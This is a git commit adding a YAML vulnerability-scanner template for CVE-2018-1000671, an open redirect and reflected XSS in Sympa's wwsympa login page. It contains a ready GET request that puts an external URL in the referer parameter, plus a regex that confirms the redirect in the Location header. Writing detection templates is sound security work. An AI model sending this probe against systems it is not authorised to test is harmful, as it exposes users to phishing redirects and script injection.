Create CVE-2018-1000671.yaml
parent
957c4e4d77
commit
a4eedf50df
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2018-1000671
|
||||
|
||||
info:
|
||||
name: Sympa version 6.2.16 - Open redirect and XSS
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: sympa version 6.2.16 and later contains a CWE-601: URL Redirection to Untrusted Site vulnerability in The referer parameter of the wwsympa fcgi login action. that can result in Open redirection and reflected XSS via data URIs.
|
||||
reference:
|
||||
- https://github.com/sympa-community/sympa/issues/268
|
||||
- https://www.cvedetails.com/cve/CVE-2018-1000671
|
||||
- https://vuldb.com/?id.123670
|
||||
tags: cve,cve2018,redirect,sympa,debian
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-1000671
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/sympa?referer=https://www.example.com&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
||||
part: header
|
Loading…
Reference in New Issue